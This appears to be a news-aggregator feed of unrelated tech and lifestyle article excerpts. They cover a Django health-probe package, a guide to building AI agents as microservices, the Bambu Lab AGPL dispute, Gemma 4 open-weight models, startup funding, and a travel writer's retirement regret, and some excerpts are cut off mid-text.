And I think this taught me an important lesson about software development: sometimes the best solution is not deeper engineering complexity, but changing perspective. Instead of asking, “How do I technically eliminate the delay?”, I started asking, “What would make this minute genuinely useful for the user?”
That shift completely changed the experience of the app.
Ironically, the long API call became an opportunity to strengthen the product’s identity. The app stopped feeling like a simple image generator and started feeling more like a helpful gardening companion.

---
## Easier Bets to Get Early Customer Validation and VC Attention

> Published: 2026-05-24 04:26:55+00:00
> Source: https://dev.to/anantdhavale1/easier-bets-to-get-early-customer-validation-and-vc-attention-12go
> wpnews: https://wpnews.pro/news/easier-bets-to-get-early-customer-validation-and-vc-attention

The article argues that achieving scale in Enterprise AI requires significant resources, making early customer validation difficult for most startups. It suggests that VCs prioritize user adoption, which is easier to obtain with focused ideas like personalized AI agents or domain-specific GPTs rather than large platforms. The author notes that VCs outside the US are particularly risk-averse and require proven revenue before investing.

There is not much of scale to be achieved in the Enterprise AI space unless you have a big team, a solid funding pipeline and a large multi-capability platform. Most AI work on the B2B large organization side is going to be building services, data products, APIs and integrating AI agents.
From my experience, what VCs look for is user adoption/ customer validation. Now, that typically takes a year or so depending how strong your network is or whether you have a dedicated sales and marketing org within. Most startups do no have that kind of money or resource, so getting customer validation early is difficult.
Personalized AI agents, recruitment AI, domain specific GPTs, smaller SaaS etc. are better ideas to get both, some early recurring revenue and the consecutive VC support.
VCs outside of the US ( especially San Francisco) are risk averse and need to see the money before they can potentially invest.
I am not trying to dissuade people from entering the enterprise space, rather I have listed the things that I have observed being in this space for the past few months or so.
Would love to know yall's views.

---
## django-deploy-probes — deployment probe endpoints for Django

> Published: 2026-05-24 04:26:25+00:00
> Source: https://dev.to/emfpdlzj/django-deploy-probes-deployment-probe-endpoints-for-django-5akb
> wpnews: https://wpnews.pro/news/django-deploy-probes-deployment-probe-endpoints-for-django

The article introduces **django-deploy-probes**, a small Django package that provides standardized health check endpoints (`/healthz`, `/readyz`, `/startupz`, `/version`) for production deployment workflows like Kubernetes probes and Docker health checks. It separates lightweight liveness checks from dependency checks (e.g., database, Redis) by design, placing the latter in `/readyz` or `/startupz` to avoid mixing concerns. The package aims to replace the inconsistent, repeatedly rewritten health check logic found across Django projects with a reusable, simple solution.

When deploying Django applications, I kept running into the same problem: health check endpoints were implemented differently in every project, and liveness checks often got mixed together with dependency checks.

I built `django-deploy-probes`

to make that cleaner.

It is a small Django package that adds these endpoints:

`/healthz`

`/readyz`

`/startupz`

`/version`

The package is meant for production deployment workflows such as Docker health checks, Kubernetes liveness/readiness/startup probes, blue-green deployments, rolling deployments, and CI/CD deployment validation.

One design choice I cared about was keeping `/healthz`

lightweight. Database, Redis, Celery, or other dependency checks do not belong in a liveness endpoint by default, so those checks are meant to live in `/readyz`

or `/startupz`

and be enabled explicitly through settings.

The goal was not to build a full monitoring system, but to provide a small, reusable package for a piece of deployment logic that tends to get rewritten over and over in Django projects.

Installation is simple:

```
pip install django-deploy-probes
```

Then include the URLs in your Django project:

``` python
from django.urls import include, path

urlpatterns = [
    path("probes/", include("django_deploy_probes.urls")),
]
```

That gives you endpoints like:

- /probes/healthz
- /probes/readyz
- /probes/startupz
- /probes/version The first public release is 0.1.0, and it is available on both GitHub and PyPI.

GitHub: [https://github.com/emfpdlzj/django-deploy-probes](https://github.com/emfpdlzj/django-deploy-probes)

PyPI: [https://pypi.org/project/django-deploy-probes/](https://pypi.org/project/django-deploy-probes/)

I’d appreciate feedback from people running Django in production, especially around the endpoint split, default behavior, and whether there are deployment cases I should support better.

---
## AI Won’t Replace Developers. Weak Thinking Will.

> Published: 2026-05-24 04:24:49+00:00
> Source: https://dev.to/jaideepparashar/ai-wont-replace-developers-weak-thinking-will-fee
> wpnews: https://wpnews.pro/news/ai-wont-replace-developers-weak-thinking-will

The article argues that AI will not replace software developers, but that weak thinking and a lack of deep understanding pose the real threat to their careers. It states that AI removes friction from coding tasks, making execution easier, but it cannot replace the human ability to think clearly and build mental models. Ultimately, the most successful developers will be those who use AI as a collaborative tool to amplify their structured thinking and experience, rather than those who become over-dependent on it for shallow code generation.

The conversation around AI is full of fear.
Every day, developers are asking the same questions:
“Will AI take my job?”
“Is coding becoming obsolete?”
“Should I even continue learning development?”
But after years of studying systems, business, human behavior, and Artificial Intelligence, I believe most people are asking the wrong question.
The real threat is not AI.
The real threat is weak thinking.
AI Changes Execution. Thinking Still Creates Value.
AI can now:
But there is something AI still depends on:
Human direction.
AI amplifies thinking.
It does not replace it.
A weak thinker with powerful AI tools will still produce weak outcomes.
A clear thinker with AI becomes exponentially more powerful.
That is the real shift happening right now.
The Developers Who Will Win
The future does not belong to developers who simply memorize syntax.
It belongs to developers who can:
The modern developer is no longer just a coder.
The modern developer is becoming:
Coding is evolving from manual production to intelligent direction.
AI Is Removing Friction
This is important to understand.
AI is not destroying development.
AI is removing friction from development.
Things that once took:
can now be done in minutes.
This creates a new reality:
Execution becomes easier.
Thinking becomes rarer.
And rare skills become valuable.
The Dangerous Illusion
Many developers are becoming overdependent on AI.
They copy.
Paste.
Generate.
Ship.
But they do not deeply understand:
This creates an illusion of competence.
AI can help you produce code.
But it cannot replace deep understanding.
And eventually, shallow knowledge collapses under complexity.
The New Competitive Advantage
In the AI era, your advantage is no longer:
Your advantage becomes:
The developers who succeed will not fight AI.
They will collaborate with it.
My Personal Observation
I have spent years studying:
One pattern keeps repeating:
Tools change.
Human leverage principles remain the same.
People who think clearly outperform people who simply work harder.
AI magnifies this difference dramatically.
Developers Must Build Mental Models
The future developer must go beyond tutorials.
You must build mental models.
Understand:
Because AI can generate information.
But wisdom still requires experience.
That is why I strongly believe:
“In a world of generated content, experience becomes the real currency.”
The Real Skill of the Future
The most valuable skill is not prompting.
It is structured thinking.
Prompt engineering itself is ultimately a reflection of thinking quality.
Better thinking creates:
AI exposes how clearly you think.
Final Thought
AI is not the end of developers.
It is the beginning of a new category of developers.
The ones who survive will not necessarily be the smartest coders.
They will be the clearest thinkers.
Because in the AI era:
Execution is automated.
Thinking is leveraged.
Adaptability becomes survival.
And the developers who learn how to think deeply while using AI effectively will become unstoppable.

---
## Building Micro Agents as Production-Grade Microservices

> Published: 2026-05-24 04:24:16+00:00
> Source: https://dev.to/murali8k/building-micro-agents-as-production-grade-microservices-f4j
> wpnews: https://wpnews.pro/news/building-micro-agents-as-production-grade-microservices

This article describes how to build production-grade AI agent systems using a microservices architecture, moving beyond single-process prototypes that fail at scale. It advocates for designing each "micro agent" as an independent service with its own API contract, memory scope, and SLA, using technologies like FastAPI, gRPC, Kafka, and Kubernetes. The guide provides concrete implementation patterns including stateless LLM inference, external memory stores, idempotent tool calls, async task queues, and a standardized project structure with health checks and observability.

Build production-grade AI agent systems using microservices. Covers FastAPI, gRPC, Kafka, Kubernetes, OpenTelemetry, and fault-tolerant orchestration patterns in Python.

### Table of Contents

- Introduction & Motivation
- Core Architecture Principles
- Agent Service Design
- The AgentRunner Loop
- Inter-Agent Communication
- Tool Registry Service
- Memory Architecture
- Context Window Management
- Orchestrator & Supervisor Pattern
- Security & Authorization
- Observability: Traces, Logs, Metrics
- Deployment on Kubernetes
- Scaling Strategies
- Fault Tolerance & Retry Strategies
- Testing Agent Microservices
- CI/CD Pipeline for Agent Services
- Cost Management & Token Budgeting
- Production Readiness Checklist
- Reference Architecture Diagram

### Introduction & Motivation

#### Why monolithic agent systems fail in production

A single-process agent that handles reasoning, tool calls, memory retrieval, and output generation works well in prototypes. In production it breaks in predictable ways:

-
**Latency coupling**— one slow tool call blocks the entire inference loop -
**Unscalable compute**— you cannot scale the summarization workload independently from the search workload -
**Blast radius**— a single LLM API timeout or memory corruption takes the whole system down -
**Zero deployment granularity**— updating one tool integration requires redeploying everything -
**No isolation for billing**— impossible to attribute compute cost to individual agent functions

#### The microservice solution

Each autonomous capability becomes an independently deployable, independently scalable service with:

- Its own API surface (HTTP/gRPC)
- Its own health checks and readiness probes
- Its own memory scope (no shared in-process state)
- Its own tool bindings (resolved at runtime from a Tool Registry)
- Its own observability (distributed traces, metrics, structured logs)

#### What is a Micro Agent?

A **micro agent** is a bounded autonomous service that:

- Accepts a task (prompt + context + session ID) via an API call
- Runs a plan → act → observe loop using an LLM backend
- Invokes tools via a centralized Tool Registry
- Stores and retrieves conversation state from an external memory store
- Returns a typed result or emits an event to downstream consumers

Key insight:A micro agent is not a “smart function” — it is a service with its own API contract, memory scope, failure modes, and SLA. Design it accordingly.

### Core Architecture Principles

#### Single Responsibility

Each agent owns exactly one reasoning domain. Examples:

#### Stateless Reasoning, Stateful Memory

The LLM inference step **must be stateless**. Memory lives in external stores:

No conversation history should ever live in in-process RAM between requests.

#### Schema-First Tool Contracts

Every tool must have a JSON Schema definition published to a shared Tool Registry before any agent can invoke it. No ad-hoc function signatures. This enables:

- Runtime input validation before LLM output reaches backend services
- Auto-generated documentation
- Tool versioning with backwards compatibility checks

#### Idempotent Actions

Any tool call that modifies external state (send email, write to DB, trigger webhook) must be idempotent. Strategies:

- Use
**idempotency keys** at the HTTP layer (pass Idempotency-Key header) - Use
**message deduplication** at the queue level (Kafka exactly-once semantics) - Design tool handlers to be safe to retry: check-then-act patterns

#### Async by Default

Long-running agent tasks (multi-step research, code generation + execution) must use async task queues — not synchronous HTTP with long timeouts.

Client ──► POST /tasks ──► Kafka/BullMQ ──► AgentWorker

Client ──► GET /tasks/{id} ──► Redis (status polling)

◄── WebSocket/SSE push (optional)

#### Explicit Context Boundaries

Each agent invocation carries a **bounded context packet** — never grow unbounded message histories. A ContextManager service compresses/summarizes history before injection.

### Agent Service Design

#### Project Layout

Each agent is a containerized FastAPI or gRPC service with this canonical structure:

agent-search/

├── agent/

│ ├── core.py # AgentRunner: plan → act → observe loop

│ ├── prompts.py # System prompt + few-shot templates

│ ├── memory.py # ContextManager: load/compress/save

│ ├── tools.py # Tool bindings (calls Tool Registry)

│ └── schemas.py # Pydantic models for all I/O

├── api/

│ ├── routes.py # POST /run, GET /status/{task_id}

│ ├── middleware.py # Auth, rate limiting, request tracing

│ └── deps.py # Dependency injection: DB, Redis, LLM client

├── tests/

│ ├── unit/

│ ├── integration/

│ └── fixtures/

├── Dockerfile

├── pyproject.toml

└── k8s/

├── deployment.yaml

├── service.yaml

├── hpa.yaml

└── configmap.yaml

#### API Contract

Every agent exposes these HTTP endpoints at minimum:

POST /run Submit a task (sync, short tasks only)

POST /tasks Submit a task (async, returns task_id)

GET /tasks/{task_id} Poll task status and result

GET /health Liveness probe

GET /ready Readiness probe (checks LLM + memory store)

GET /metrics Prometheus metrics endpoint

``` python
# agent/schemas.py
from pydantic import BaseModel, Field
from typing import Optional, Dict, Any
from enum import Enum

class TaskStatus(str, Enum):
    PENDING = "pending"
    RUNNING = "running"
    COMPLETED = "completed"
    FAILED = "failed"
    CANCELLED = "cancelled"

class AgentTask(BaseModel):
    id: str
    session_id: str
    prompt: str
    metadata: Dict[str, Any] = Field(default_factory=dict)
    max_steps: int = Field(default=10, ge=1, le=25)
    token_budget: int = Field(default=8192, ge=512, le=32768)

class AgentResult(BaseModel):
    task_id: str
    status: TaskStatus
    output: Optional[str] = None
    steps_used: int = 0
    tokens_used: int = 0
    tool_calls: int = 0
    error: Optional[str] = None
    duration_ms: int = 0
```

### The AgentRunner Loop

#### Full Implementation

``` python
# agent/core.py
import asyncio
import time
from opentelemetry import trace
from tenacity import retry, stop_after_attempt, wait_exponential_jitter

tracer = trace.get_tracer( __name__ )
MAX_STEPS = 15

class AgentRunner:
    def __init__ (self, agent_id: str, config: AgentConfig):
        self.agent_id = agent_id
        self.llm = LLMClient(model=config.model, timeout=30)
        self.memory = ContextManager(agent_id, max_tokens=config.context_limit)
        self.tools = ToolRegistryClient(config.tool_registry_url)
        self.metrics = AgentMetrics(agent_id)

    async def run(self, task: AgentTask) -> AgentResult:
        start = time.monotonic()

        with tracer.start_as_current_span("agent.run") as span:
            span.set_attribute("agent.id", self.agent_id)
            span.set_attribute("agent.task_id", task.id)
            span.set_attribute("agent.session", task.session_id)

            try:
                result = await self._run_loop(task, span)
            except TokenBudgetExceeded as e:
                result = AgentResult(
                    task_id=task.id,
                    status=TaskStatus.COMPLETED,
                    output=e.partial_output,
                    error="token_budget_exceeded"
                )
            except Exception as e:
                span.record_exception(e)
                result = AgentResult(
                    task_id=task.id,
                    status=TaskStatus.FAILED,
                    error=str(e)
                )
            finally:
                result.duration_ms = int((time.monotonic() - start) * 1000)
                self.metrics.record(result)

            return result

    async def _run_loop(self, task: AgentTask, span) -> AgentResult:
        # Load available tools from registry
        tool_schemas = await self.tools.fetch(agent_id=self.agent_id)

        # Load and compress conversation history
        context = await self.memory.load(task.session_id)
        messages = build_messages(context, task.prompt)

        total_tokens = 0
        tool_call_count = 0

        for step in range(task.max_steps):
            span.set_attribute("agent.current_step", step)

            with tracer.start_as_current_span("agent.llm_call") as llm_span:
                response = await self._complete_with_retry(messages, tool_schemas)
                llm_span.set_attribute("llm.prompt_tokens", response.usage.prompt_tokens)
                llm_span.set_attribute("llm.completion_tokens", response.usage.completion_tokens)

            total_tokens += response.usage.total_tokens

            if total_tokens > task.token_budget:
                raise TokenBudgetExceeded(
                    partial_output=response.content,
                    tokens_used=total_tokens
                )

            if response.finish_reason == "stop":
                await self.memory.save(task.session_id, messages + [response.message])
                return AgentResult(
                    task_id=task.id,
                    status=TaskStatus.COMPLETED,
                    output=response.content,
                    steps_used=step + 1,
                    tokens_used=total_tokens,
                    tool_calls=tool_call_count
                )

            if response.tool_calls:
                tool_call_count += len(response.tool_calls)
                results = await self._execute_tools(response.tool_calls)
                messages.append(response.message)
                messages.extend(tool_result_messages(results))

        # Hit max steps — return best available output
        return AgentResult(
            task_id=task.id,
            status=TaskStatus.COMPLETED,
            output=response.content,
            steps_used=task.max_steps,
            tokens_used=total_tokens,
            error="max_steps_reached"
        )

    @retry(stop=stop_after_attempt(3), wait=wait_exponential_jitter(max=15))
    async def _complete_with_retry(self, messages, tools):
        return await self.llm.complete(messages=messages, tools=tools)

    async def _execute_tools(self, tool_calls):
        tasks = [self.tools.invoke(tc) for tc in tool_calls]
        return await asyncio.gather(*tasks, return_exceptions=True)
```

### Inter-Agent Communication

#### Pattern Selection Matrix

#### gRPC Service Definition

For synchronous sub-agent calls, gRPC provides strong typing, bidirectional streaming, and efficient binary serialization.

```
// proto/agent_service.proto
syntax = "proto3";
package agents.v1;

service AgentService {
  rpc RunTask (TaskRequest) returns (TaskResponse);
  rpc StreamSteps (TaskRequest) returns (stream StepEvent);
  rpc Health (HealthRequest) returns (HealthResponse);
}

message TaskRequest {
  string task_id = 1;
  string session_id = 2;
  string prompt = 3;
  map<string, string> metadata = 4;
  int32 max_steps = 5;
  int32 token_budget = 6;
}

message TaskResponse {
  string task_id = 1;
  string status = 2;
  string output = 3;
  int32 steps_used = 4;
  int32 tokens_used = 5;
  string error = 6;
}

message StepEvent {
  int32 step_number = 1;
  string type = 2; // "llm_call" | "tool_call" | "tool_result"
  string content = 3;
}
```

#### Kafka Event Schema

For async pipeline handoffs between agents, use Avro or JSON schemas registered in a Schema Registry.

```
{
  "schema": {
    "type": "record",
    "name": "AgentTaskEvent",
    "namespace": "com.myco.agents.v1",
    "fields": [
      {"name": "task_id", "type": "string"},
      {"name": "source_agent", "type": "string"},
      {"name": "target_agent", "type": "string"},
      {"name": "session_id", "type": "string"},
      {"name": "prompt", "type": "string"},
      {"name": "context", "type": {"type": "map", "values": "string"}},
      {"name": "created_at", "type": {"type": "long", "logicalType": "timestamp-millis"}}
    ]
  }
}
```

#### Kafka Producer (in Orchestrator)

``` python
# In orchestrator when dispatching to agent-search
from aiokafka import AIOKafkaProduce

---
## When I was done raising my kids, I spent my late 40s traveling. I forgot to save for retirement in the process.

> Published: 2026-05-24 04:24:01+00:00
> Source: https://www.businessinsider.com/forgot-to-plan-for-my-retirement-regret-2026-5
> wpnews: https://wpnews.pro/news/when-i-was-done-raising-my-kids-i-spent-my-late-40s-traveling-i-forgot-to-save

The article summarizes the author's realization at age 53 that her late-40s decision to prioritize travel over saving for retirement has left her financially unprepared. After raising four sons as a single mother, she became a travel writer and spent years on trips, accumulating air miles instead of retirement funds. Now, with her 26-year-old son's help, she is beginning to save, potentially retiring by age 75 if she manages her finances wisely.

It occurred to me at 3:32 one morning, the witching-est of hours, the worst possible time to wake up. I was jet-lagged after flying home from Norway. My suitcase was on the floor, waiting to be unpacked and repacked for my next trip in just two weeks.
I had $247 in my checking account. I didn't want to think about how much was in my savings account because it was probably less.
I am 53 years old, a mother of four adult children, a new-ish travel writer, and I am just now realizing that I have made my life a little ridiculous.
When I wake up the next morning, I'm easier on myself. I'm not ridiculous, even in the middle of the night, I know I'm not. But I think I took a wrong turn a few years back that felt like a right turn at the time.
Travel has always been in my blood
I always wanted to travel. Always. When I was raising my four sons as a single mom, I planned out pretend itineraries for myself online on Friday nights instead of socializing. Friends gave me their itineraries for tours of Egypt, for hiking trails through Portugal, and for a weekend in Paris. I followed along with my morning coffee, thinking, "one day."
I couldn't travel then, of course. I was in my 30s, raising my kids by myself. I was working cobbled-together jobs as a local baker, waitress, receptionist, anything at all to pay our bills. We survived together, and my sons grew up. They became their own people in their own lives.
Then it was my time to make some decisions about my life. I was young, just 46 years old, when my youngest turned 18. I could have gotten the education I missed out on when I became a young mom at 21. An education that might have led me to a job with a retirement plan and some security.
Instead, I wrote. I wrote for my local paper and online magazines. I wrote about motherhood. Then I finally traveled, small, cheap trips at first that I wrote about for my local paper, for online magazines. And eventually, travel, miraculously, impossibly, became one of my jobs.
It has been a dream job in many ways
Being a travel writer has been a dream in so many ways. Especially since it has given me the chance to travel with my adult kids in a way I might never have experienced otherwise.
My son and I went on a safari in South Africa after he got married. I took my daughter-in-law on our own little honeymoon to celebrate our new status together, a journey that sort of anchored us in a different way of bridging that in-law gap. I've flown solo to Morocco and Copenhagen, gone on a wellness retreat in Mexico, and stayed in a chateau in the south of France.
"Must be nice," is what I hear all the time. And it is.
I'm not sure what my future will bring
Every part of this life is incredible. Until I look at my bank account, barely fueled with small payments trickling in for articles I've written. Until I see my older face in the mirror and remember I will need to retire someday, and I've done nothing to prepare.
I've saved up air miles instead of money. I've prioritized experiences over security. I can't even think about the legacy I'm leaving for my sons. Boarding passes? Novelty tote bags? Branded water bottles from press trip swag bags?
I don't blame the travel writing for my bank account balance; I blame my all-or-nothing attitude. I know it's possible to do a little travel and still put money away for retirement. I know this because my 26-year-old son just sat me down with a spreadsheet to help me start saving.
According to his calculations, I might be able to retire by the time I'm 75 and still travel a bit if I'm smart about it. Finally, I might be ready to be smart about money. I'm tired of feeling ridiculous.

---
## 'Fuck you, Bambu': How one private message could change the face of 3D printing

> Published: 2026-05-24 04:22:39+00:00
> Source: https://www.theverge.com/tech/931532/bambu-agpl-pawel-jarczak-open-source-threat-dmca-github
> wpnews: https://wpnews.pro/news/fuck-you-bambu-how-one-private-message-could-change-the-face-of-3d-printing

Bambu Lab, a leading 3D printer manufacturer, is facing backlash after sending a private message to developer Paweł Jarczak asking him to remove code that allowed remote control of its printers without official software. The request has sparked outrage among open-source advocates and prominent tech figures, who are funding a legal defense and forking Bambu's code in protest. The controversy centers on whether Bambu is protecting its ecosystem or acting as a "bad actor" against the open-source community.

Bambu Lab makes the best, most accessible 3D printers yet, but that reputation is suddenly under siege. It all started when Paweł Jarczak received a private message from the company on Reddit asking him to delete his code. Now the 3D printing community is lining up behind Jarczak to fund a war against Bambu — and the future of 3D printers could be at stake.
‘Fuck you, Bambu’: How one private message could change the face of 3D printing
Bambu was set to become the Apple of 3D printers. Then it DM’d the wrong person.
‘Fuck you, Bambu’: How one private message could change the face of 3D printing
Bambu was set to become the Apple of 3D printers. Then it DM’d the wrong person.
Jarczak is a developer who shared a way to let people remote control their Bambu printers without using Bambu software. But Bambu wanted to lock down its system, despite relying on open-source code. That provoked a furious coalition of open-source advocates and YouTubers to respond.
“I’ll put up $10,000 to teach bambu labs a lesson,” declared consumer rights advocate Louis Rossmann, pledging to help defend Jarczak in court.
“I’m never buying a Bambu Lab 3D printer again,” stated maker Jeff Geerling, adding that he’d gladly chip in too. (He’s changed the YouTube title since.)
“Go fuck yourself, Bambu,” wrote GamersNexus, pledging to commit $10,000 as well. (It’s also halting previously unannounced plans to buy $150,000 of Bambu hardware for a 3D printing project, editor-in-chief Steve Burke tells The Verge.)
If that wasn’t enough, Rossmann, Burke, and thousands of other open-source advocates are daring Bambu to take legal action — they’re each forking the code Bambu was hoping to suppress. As of Monday, so is the Software Freedom Conservancy, which is now hosting an entire project to reverse engineer Bambu’s code and says it will serve as a Bambu watchdog.
“They’re bad actors, straight-up, and the community should do whatever we can,” Bradley Kühn, father of the AGPL open-source license and policy fellow at the Software Freedom Conservancy, tells The Verge.
But why is everyone so mad that Bambu’s printers don’t work perfectly with third-party apps? Are Bambu’s actions really that egregious, or is it just trying to protect its ecosystem? I spoke to Bambu, Jarczak, lawyers, and others to understand. Both Bambu and Jarczak shared copies of their private communications for this story with The Verge, each eager to set the record straight on what actually happened.
This is the story of how everything went wrong, and how it could become right again.
What is actually going on with Bambu and Paweł Jarczak?
On April 22nd, when Bambu first reached out to Jarczak in a Reddit private message, its tone seemed polite. Bambu suggested it was warning Jarczak of upcoming changes that could prevent his code from working. The first DM concludes: “we kindly ask you to consider removing the current connection approach, as it mimics official Bambu Lab software.”
Jarczak replied that he was ready to remove his entire project from GitHub and thanked the company for noticing his work. But he wanted to be “properly acknowledged” for possibly revealing “a significant security gap.” He offered further help for a fix while requesting some gear — specifically the flagship H2D printer.
But Bambu was not ready to reward or recognize him for promoting ways to use unauthorized third-party software and hardware that competes with its own. (Jarczak’s previous project was supporting a cheaper way to print in multiple colors than buying Bambu’s $279 AMS Lite, a project he’s since suggested Bambu should also recognize him for.)
Ominously, Bambu started talking to Jarczak like a mobster: “We wanted to speak with you first and handle this in a constructive way. That said, we can’t allow this approach to continue.”
Jarczak bristled. He had publicly voiced some suspicion that what he’d done had crossed a line. But he also knew that Bambu’s code was open-source under AGPL, a license so permissive that Google famously banned its engineers from using it at all.
The developer wanted to know: What, specifically, had he done wrong if the code was open-source?
Instead of explaining, Bambu ramped up its threat. It told Jarczak that a cease and desist letter had already been prepared, and “invited” him to look at section 1201 of the Digital Millennium Copyright Act, implying it could legally punish him for breaking digital locks.
But Bambu didn’t sue. It didn’t send a cease and desist letter. It didn’t even send a DMCA takedown to remove his files from GitHub. Jarczak voluntarily took his code down. But in that code’s place, Jarczak left a note suggesting that Bambu treated him like a criminal.
That’s when the internet pounced.
Why is the open-source 3D printing community so upset?
Because Bambu’s software is not just Bambu’s software. “Bambu Studio is based on PrusaSlicer by Prusa Research, which is from Slic3r by Alessandro Ranellucci and the RepRap community,” Bambu freely admits on its websites.
“Based on” doesn’t just mean Bambu took inspiration from those programs. Bambu Studio is similar to PrusaSlicer because it’s a fork of PrusaSlicer. It’s built atop the same code.
Every modern 3D printer uses a piece of software called a slicer, which “slices” 3D objects into layers, then turns those layers into instructions that a 3D printer can follow. Over time, they’ve become the way to remote control every other part of a 3D printer as well.
Almost every slicer is built atop the slicers that came before, going back nearly 15 years to when Alessandro Ranellucci first released Slic3r to the world under the AGPL license. That license guarantees no one has to reinvent the wheel so long as they contribute their own improvements. Bambu gets enormous value from this license, but it’s beginning to crack down on users enjoying the same benefits.
Bambu freely forked PrusaSlicer, and it doesn’t contest that anyone else can fork Bambu Studio as well. But Bambu cut off the ability for forks — including the most popular fork, OrcaSlicer — to send prints, remote control the print head, monitor the printer’s camera, change filament colors, and more, until or unless their developers integrated a new proprietary authentication mechanism. (The lead developer of OrcaSlicer declined.)
Jarczak had created his own fork of OrcaSlicer to work around Bambu’s proprietary requirement, and that’s the code Bambu wanted taken down.
Last January, Bambu said its motive was security. But many suspected a profit motive too: that Bambu might use its software to lock its printers to its own filament and accessories and start charging for subscription services, the way today’s inkjet printer companies do. Bambu did not deny those possibilities when we asked, and the open-source community has been preparing to fight possible enshittification ever since.
All Jarczak was originally trying to do was keep Bambu’s software from breaking compatibility with the Biqu BCMU third-party multicolor system (that undercuts Bambu’s own $279 accessory), after some users noticed the BCMU stopped working following a Bambu firmware update.
But when he built a copy of OrcaSlicer using code from the Linux version of Bambu Studio instead of the Windows or Mac versions, Bambu’s cloud services no longer stopped him from remote controlling his own printer at all. He’d inadvertently found a way to pick Bambu’s lock using Bambu’s own open-source code. When Bambu threatened him into submission for undoing its lock, he became an unwitting martyr for a bigger cause.
“People are trying to make me into some kind of hero here, but I am not that,” Jarczak tells The Verge.
Here’s where it gets really messy.
A lot of this will come down to how the open-source license used by Bambu is interpreted both by the public and potentially by courts. Bradley Kühn, who helped put the “A” into AGPL, says it’s a slam dunk: Bambu has violated its AGPL license.
In a blog post for the Software Freedom Conservancy, he identifies two specific violations. First, Bambu’s proprietary networking plug-in itself.
The actual text of the AGPL states that anyone who copies a program must license the source code for the entire program — including any “Corresponding Source” for other bits that are needed to generate, install, run, or modify the work.
It also has explicit examples of what should count as Corresponding Source, including “shared libraries and dynamically linked subprograms that the work is specifically designed to require, such as by intimate data communication or control flow between those subprograms and other parts of the work.”
Guess what Bambu’s proprietary networking plug-in is made of? Shared libraries and dynamically linked libraries, ones that Bambu’s open-source portions automatically try to install when you first run the application, and ones that — Kühn and Jarczak both say — have intimate communication with Bambu’s open-source code.
Jarczak has now published a 30-point analysis at his GitHub page that runs down just how intimate that communication could be:
The second violation, Kühn writes, is how Bambu allegedly pressured Jarczak to remove his code from GitHub while falsely claiming its terms of service trump his rights under the AGPL license.
But neither Kühn nor Jarczak is a lawyer. Bambu has lawyers, and two lawyers who specialize in open-source tech tell The Verge that the AGPL is difficult to rely on.
What do Bambu and the lawyers say?
Bambu answered almost every question we sent over the course of a full week. Head of PR Nadia Yaakoubi told us that the company isn’t concerned about “open-source development or legitimate code forks.” (Bambu is implying Jarczak’s fork is illegitimate.)
The company argues that some of its code is “separately delivered” and therefore isn’t covered by the AGPLv3 license where “Corresponding Sources” are concerned. Here’s what it told us:
We do not agree that the networking plugin is properly characterized as part of Bambu Studio’s “Corresponding Source” for purposes of AGPLv3, such that AGPLv3 source-availability obligations would be triggered. It is a separately delivered, optional networking component that provides additional functionality. The fact that software may load a separate component at runtime does not establish that the component is part of the covered work or that it is source code; the work is “specifically designed to require” under Section 1, which defines the scope of “Corresponding Source.” And as you mentioned, AGPL also does not authorize any access violating the rules and protocols for communication across the network.
Kyle Mitchell, an independent tech lawyer who’s studied the AGPL, tells The Verge it’s quite possible that Bambu doesn’t need to share everything that touches its open-source code, particularly when we’re talking about cloud services.
“The AGPL, because of the problem it was written to solve, and because of the way it was written, doesn’t clearly say that if you change a program that you share to work with a web or cloud service, that you have to share all of that web and cloud service alike too,” he tells me over the phone.
Even with a plug-in, there is some degree of technical separation, he says — though Heather Meeker, a prominent open-source licensing expert and attorney, says a plug-in would at least “generally be part of Corresponding Source.”
Mitchell says Bambu’s statement to The Verge “goes right at the uncertainty,” the parts of the law that aren’t automatically clear and would have to be clarified by the courts — and for better or worse, the courts have not meaningfully weighed in on the text of the AGPL. “How broad the source code sharing requirement goes — there’s very little law to answer these questions,” Meeker confirms.
Says Mitchell: “There are no definitive answers to be found, just positions to take, which are just predictions about what courts would do.”
And — generally speaking — Meeker says not just anyone can meaningfully go after a 

---
## Why Open-Weight Models Like Gemma 4 Are the Future of Secure Backend Architecture

> Published: 2026-05-24 04:20:09+00:00
> Source: https://dev.to/ali_haroon_0111/why-open-weight-models-like-gemma-4-are-the-future-of-secure-backend-architecture-j87
> wpnews: https://wpnews.pro/news/why-open-weight-models-like-gemma-4-are-the-future-of-secure-backend

The article explains that Google's Gemma 4, a family of open-weight AI models released under the Apache 2.0 license, runs entirely offline on a user's own laptop without requiring a subscription or internet connection. This model is presented as a solution for developers in regions like Pakistan who face barriers such as high API costs and unreliable internet access, offering them permanent, free access to powerful AI that cannot be revoked or locked behind a paywall.

Why Open-Weight Models Like Gemma 4 Are the Future of Secure Backend Architecture
How Google's free, offline AI is breaking barriers for millions of developers — especially in Pakistan
The Problem Nobody Talks About
Imagine you are a talented developer in Lahore, Karachi, or a small town in rural Punjab. You have the skills. You have the ambition. You have ideas that could build the next great product.
But you face a wall that developers in San Francisco or London simply do not.
Your internet package ran out three days before your deadline. The cloud API bill arrived and it is more than your weekly grocery budget. The connection drops mid-session and you lose your entire conversation with the AI assistant😒. You simply cannot afford $20 per month for a ChatGPT subscription on top of everything else.
This is the daily reality for tens of millions of developers across South Asia, Africa, and the developing world. AI is supposed to be the great equalizer — the technology that lets a solo developer compete with a Silicon Valley team. But when AI lives behind a paywall or requires a fast, stable internet connection, it becomes yet another advantage for those who are already advantaged.
Until now.
What Is Gemma 4?
Gemma 4 is Google's latest family of open-weight AI models, released in April 2026. Think of it as a free, private, and highly capable AI assistant that lives entirely on your own laptop — no cloud, no subscription, no internet required.
Unlike ChatGPT or Google's own Gemini API — which process your data on remote servers and charge you per request — Gemma 4 is fundamentally different. Google has released the model weights under the Apache 2.0 open-source license, which means the core intelligence of the model is yours to download, run, modify, and even build products on top of, completely free.
It comes in four sizes designed for different hardware:
Every single one of them runs 100% offline.
Why Is Gemma 4 Completely Free?
This question deserves a real answer, because when something powerful is free, people assume there is a catch. With Gemma 4, the economics are genuinely different.
The business model of services like ChatGPT is straightforward: they run massive data centers full of expensive GPUs, process your messages on their servers, and charge you for that compute.
With Gemma 4, Google releases the model weights publicly and you run it on your own hardware. Google has no server costs for your usage, because you are the server. That is why they can offer it for free. The Apache 2.0 license even allows commercial use — you can build and sell products powered by Gemma 4 without any legal restrictions.
What you need to run it:
Most laptops sold in the last four years meet these requirements. A mid-range Ryzen 5 machine — the kind you can find in Lahore's electronics markets — can run the E4B model comfortably.
Why Gemma 4 Will Remain Free😃
